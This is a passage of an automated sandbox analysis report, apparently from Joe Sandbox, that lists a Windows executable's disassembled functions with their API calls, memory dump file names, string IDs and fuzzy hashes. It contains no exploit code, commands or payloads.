                                                  • OleUninitialize.OLE32(?,00000000), ref: 00BCFB45
                                                  • UnregisterHotKey.USER32(?), ref: 00BCFC9C
                                                  • DestroyWindow.USER32(?), ref: 00C045D6
                                                  • FreeLibrary.KERNEL32(?), ref: 00C0463B
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C04668
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                  • String ID: close all
                                                  • API String ID: 469580280-3243417748
                                                  • Opcode ID: 8c9c2416e828c348b0b26e5e759929bda5bebe392a1ff3b40375bd8a68246c9d
                                                  • Instruction ID: 18c746ba067d863010a3a318cabda6ffe10f9e2f3bb510f58b4c39abeab63f71
                                                  • Opcode Fuzzy Hash: 8c9c2416e828c348b0b26e5e759929bda5bebe392a1ff3b40375bd8a68246c9d
                                                  • Instruction Fuzzy Hash: D7A147747012128FCB29EF14C994F6AF3A5EF05700F5542EDE90AAB2A1DB31AD56CF90
                                                  Function 00C1A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EnumChildWindows.USER32(?,00C1A439), ref: 00C1A377
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ChildEnumWindows
                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                  • API String ID: 3555792229-1603158881
                                                  • Opcode ID: ae222c9831e40b804cea793bd512881698228f266c939954a9e2365ddea047ce
                                                  • Instruction ID: b67ed4bfae75aab8838367210ad78871b31e9a6fa3f9fffa7823cc51642d739e
                                                  • Opcode Fuzzy Hash: ae222c9831e40b804cea793bd512881698228f266c939954a9e2365ddea047ce
                                                  • Instruction Fuzzy Hash: 6C91C631601609ABCB08EFA1C442BEDFBF4BF16300F548169D46DA7251DF31AAD9EB91
                                                  Function 00BC2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00BC2EAE
                                                    • Part of subcall function 00BC1DB3: GetClientRect.USER32(?,?), ref: 00BC1DDC
                                                    • Part of subcall function 00BC1DB3: GetWindowRect.USER32(?,?), ref: 00BC1E1D
                                                    • Part of subcall function 00BC1DB3: ScreenToClient.USER32(?,?), ref: 00BC1E45
                                                  • GetDC.USER32 ref: 00BFCD32
                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BFCD45
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00BFCD53
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00BFCD68
                                                  • ReleaseDC.USER32(?,00000000), ref: 00BFCD70
                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BFCDFB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                  • String ID: U
                                                  • API String ID: 4009187628-3372436214
                                                  • Opcode ID: f2c525a07bf1139a34a4da3d106f18c5fb58b3a0b79264993fdb48f1d5c31a02
                                                  • Instruction ID: 2a8cf8fd8167f866b1dd339aef92ae5b69264a8046889b198c152a63fdf1dea7
                                                  • Opcode Fuzzy Hash: f2c525a07bf1139a34a4da3d106f18c5fb58b3a0b79264993fdb48f1d5c31a02
                                                  • Instruction Fuzzy Hash: 3D716A3590020DDFCF259F64C984ABA7FF5FB49320F1442BAEE556B2A6C7309885DB60
                                                  Function 00C31A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C31A50
                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C31A7C
                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C31ABE
                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C31AD3
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C31AE0
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C31B10
                                                  • InternetCloseHandle.WININET(00000000), ref: 00C31B57
                                                    • Part of subcall function 00C32483: GetLastError.KERNEL32(?,?,00C31817,00000000,00000000,00000001), ref: 00C32498
                                                    • Part of subcall function 00C32483: SetEvent.KERNEL32(?,?,00C31817,00000000,00000000,00000001), ref: 00C324AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                  • String ID:
                                                  • API String ID: 2603140658-3916222277
                                                  • Opcode ID: 9ba391e37229c3ffd7b5327f31fd16bdea0c85e792695bd004fa480419b41aaf
                                                  • Instruction ID: 8b13cdaa02ecc2045aeaa6b9019d1e47182de45d8788b56cbcf8a035aa7d26a2
                                                  • Opcode Fuzzy Hash: 9ba391e37229c3ffd7b5327f31fd16bdea0c85e792695bd004fa480419b41aaf
                                                  • Instruction Fuzzy Hash: C2418AB1511208BFEB118F51CC89FBEBBACFB09354F04412AFE159A141EB749E419BA0
                                                  Function 00C38C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C4F910), ref: 00C38D28
                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C4F910), ref: 00C38D5C
                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C38ED6
                                                  • SysFreeString.OLEAUT32(?), ref: 00C38F00
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                  • String ID:
                                                  • API String ID: 560350794-0
                                                  • Opcode ID: 3f056ed84ce9d2c35297449f5bba66925cac181a2543cc552bb6eb05c84224bc
                                                  • Instruction ID: 27388b837d6209c0f7ad40834e67128673813d658407c82f3fda71a2a72ad99c
                                                  • Opcode Fuzzy Hash: 3f056ed84ce9d2c35297449f5bba66925cac181a2543cc552bb6eb05c84224bc
                                                  • Instruction Fuzzy Hash: 34F13775A10209EFDF04DF94C888EAEB7B9FF49314F108498F915AB251DB71AE46CB90
                                                  Function 00C3F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C3F6B5
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C3F848
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C3F86C
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C3F8AC
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C3F8CE
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C3FA4A
                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C3FA7C
                                                  • CloseHandle.KERNEL32(?), ref: 00C3FAAB
                                                  • CloseHandle.KERNEL32(?), ref: 00C3FB22
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                  • String ID:
                                                  • API String ID: 4090791747-0
                                                  • Opcode ID: 6c05167739da34bbc90efbf41f1d509cd4a23293c3202aa122072b7d73f31ac2
                                                  • Instruction ID: 7c858d4249d4e95fd6d46dcbf3c1d08e2686dce6ade3c86753213afa2f654aac
                                                  • Opcode Fuzzy Hash: 6c05167739da34bbc90efbf41f1d509cd4a23293c3202aa122072b7d73f31ac2
                                                  • Instruction Fuzzy Hash: 26E1C131614341AFDB14EF24C881B6ABBE1FF85354F14896DF8998B2A1CB30DD46DB52
                                                  Function 00C24CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C2466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C23697,?), ref: 00C2468B
                                                    • Part of subcall function 00C2466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C23697,?), ref: 00C246A4
                                                    • Part of subcall function 00C24A31: GetFileAttributesW.KERNEL32(?,00C2370B), ref: 00C24A32
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00C24D40
                                                  • _wcscmp.LIBCMT ref: 00C24D5A
                                                  • MoveFileW.KERNEL32(?,?), ref: 00C24D75
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                  • String ID:
                                                  • API String ID: 793581249-0
                                                  • Opcode ID: d37df9d0d358033e9509d04272358430960aa86f73380e8f4cc922142e3a7d72
                                                  • Instruction ID: 89f5d8b4246cf540c74afa1748a1666831b3e5a0ace23997fafac89eddc38297
                                                  • Opcode Fuzzy Hash: d37df9d0d358033e9509d04272358430960aa86f73380e8f4cc922142e3a7d72
                                                  • Instruction Fuzzy Hash: 485153B20083959BC724DBA4DC81ADF73ECAF84350F00492EF285D3551EF75A689CB66
                                                  Function 00C48645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C486FF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: f949b4a7a4888740bf1457bcceca2beb69a3b0a6a5cf00ff326b8fc03d3de11c
                                                  • Instruction ID: 783e41c749da72156b8cd52fc55f9c35c97a358b6d5df1ae7a5e78345bc0a09e
                                                  • Opcode Fuzzy Hash: f949b4a7a4888740bf1457bcceca2beb69a3b0a6a5cf00ff326b8fc03d3de11c
                                                  • Instruction Fuzzy Hash: AB51A034600244FFEF209B29CC89FAD7BA5FB05760F604115FA65E61E1CF72AA88DB51
                                                  Function 00BC2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00BFC2F7
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BFC319
                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00BFC331
                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00BFC34F
                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BFC370
                                                  • DestroyIcon.USER32(00000000), ref: 00BFC37F
                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BFC39C
                                                  • DestroyIcon.USER32(?), ref: 00BFC3AB
                                                    • Part of subcall function 00C4A4AF: DeleteObject.GDI32(00000000), ref: 00C4A4E8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                  • String ID:
                                                  • API String ID: 2819616528-0
                                                  • Opcode ID: 412046136de13c3a6863f1ed0f8edb82e061634af19f488a6ec2dae49eec6551
                                                  • Instruction ID: 431e04ea2a245591ba4fbc20807022c907015e76cd71f565356a88a63c5835fd
                                                  • Opcode Fuzzy Hash: 412046136de13c3a6863f1ed0f8edb82e061634af19f488a6ec2dae49eec6551
                                                  • Instruction Fuzzy Hash: 28515774A40209AFDB24DF24CC85FAE7BE5FB08350F10456CF94297290DBB0AC91DB54
                                                  Function 00C1966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C1A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C1A84C
                                                    • Part of subcall function 00C1A82C: GetCurrentThreadId.KERNEL32 ref: 00C1A853
                                                    • Part of subcall function 00C1A82C: AttachThreadInput.USER32(00000000,?,00C19683,?,00000001), ref: 00C1A85A
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C1968E
                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C196AB
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C196AE
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C196B7
                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C196D5
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C196D8
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C196E1
                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C196F8
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C196FB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                  • String ID:
                                                  • API String ID: 2014098862-0
                                                  • Opcode ID: 73ee1186299e0ed04f7b4aabd8f4ef947d2848b645f1035977bb8dd1f8529647
                                                  • Instruction ID: c68b85fe9cb2f8892a5a0b8ce11e117ded3cd49c3259e62356e6a4daa5455cb6
                                                  • Opcode Fuzzy Hash: 73ee1186299e0ed04f7b4aabd8f4ef947d2848b645f1035977bb8dd1f8529647
                                                  • Instruction Fuzzy Hash: DD11E1B5910218BEF6106F60DC89FAE3B6DEB4E750F110429F244AB0E0C9F26C51EAA4
                                                  Function 00C18921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00C1892A
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C18931
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00C18946
                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00C1894E
                                                  • DuplicateHandle.KERNEL32(00000000), ref: 00C18951
                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 00C18961
                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00C18969
                                                  • DuplicateHandle.KERNEL32(00000000), ref: 00C1896C
                                                  • CreateThread.KERNEL32(00000000,00000000,00C18992,00000000,00000000,00000000), ref: 00C18986
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                  • String ID:
                                                  • API String ID: 1957940570-0
                                                  • Opcode ID: fb9dc8330f64f590b8c8023ad9df8f77f4fcb9707b782a04a4c046f17d53e395
                                                  • Instruction ID: 663166dba8039243616f271a9bc693adb294f04fcc6520e17ca03feca50570b7
                                                  • Opcode Fuzzy Hash: fb9dc8330f64f590b8c8023ad9df8f77f4fcb9707b782a04a4c046f17d53e395
                                                  • Instruction Fuzzy Hash: 4801A8B9640308FFE610ABA5DC49F6F3BACFB8A711F408425FA05DB1A1CA7098018A20
                                                  Function 00C39B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                  • API String ID: 0-572801152
                                                  • Opcode ID: 6c7f7d2fbe36cfc0812a27716cdc3acc4b63f4cbd64d08e1f6e2425af7090839
                                                  • Instruction ID: 2c346fe258c1c37b56646e443c352a648c60855205ef2077d1ea4754cfdd2367
                                                  • Opcode Fuzzy Hash: 6c7f7d2fbe36cfc0812a27716cdc3acc4b63f4cbd64d08e1f6e2425af7090839
                                                  • Instruction Fuzzy Hash: 43C1C471A1021A9FDF10DF98D885BEEB7F5FF48314F148469E915AB280E7B0AE45CB90
                                                  Function 00C39113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$_memset
                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                  • API String ID: 2862541840-625585964
                                                  • Opcode ID: 055a9e1e14276e0cbd668388aa8a4df21289ce9db5c5742106077cb68b6aed86
                                                  • Instruction ID: 6c4e82dff557d1ad403bda41a81bf3b63eb2d4570e58849bc0db0aacf50cc515
                                                  • Opcode Fuzzy Hash: 055a9e1e14276e0cbd668388aa8a4df21289ce9db5c5742106077cb68b6aed86
                                                  • Instruction Fuzzy Hash: 36918E71A10219ABDF24DFA5CC48FAFBBB8EF45710F108159F915AB290D7B09A45CFA0
                                                  Function 00C3975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C1710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?,?,?,00C17455), ref: 00C17127
                                                    • Part of subcall function 00C1710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?,?), ref: 00C17142
                                                    • Part of subcall function 00C1710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?,?), ref: 00C17150
                                                    • Part of subcall function 00C1710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?), ref: 00C17160
                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C39806
                                                  • _memset.LIBCMT ref: 00C39813
                                                  • _memset.LIBCMT ref: 00C39956
                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00C39982
                                                  • CoTaskMemFree.OLE32(?), ref: 00C3998D
                                                  Strings
                                                  • NULL Pointer assignment, xrefs: 00C399DB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                  • String ID: NULL Pointer assignment
                                                  • API String ID: 1300414916-2785691316
                                                  • Opcode ID: a0876cd1d63f3a40c70e3eec47f83cbb43033ea2a86ca3947ecf3808908316d6
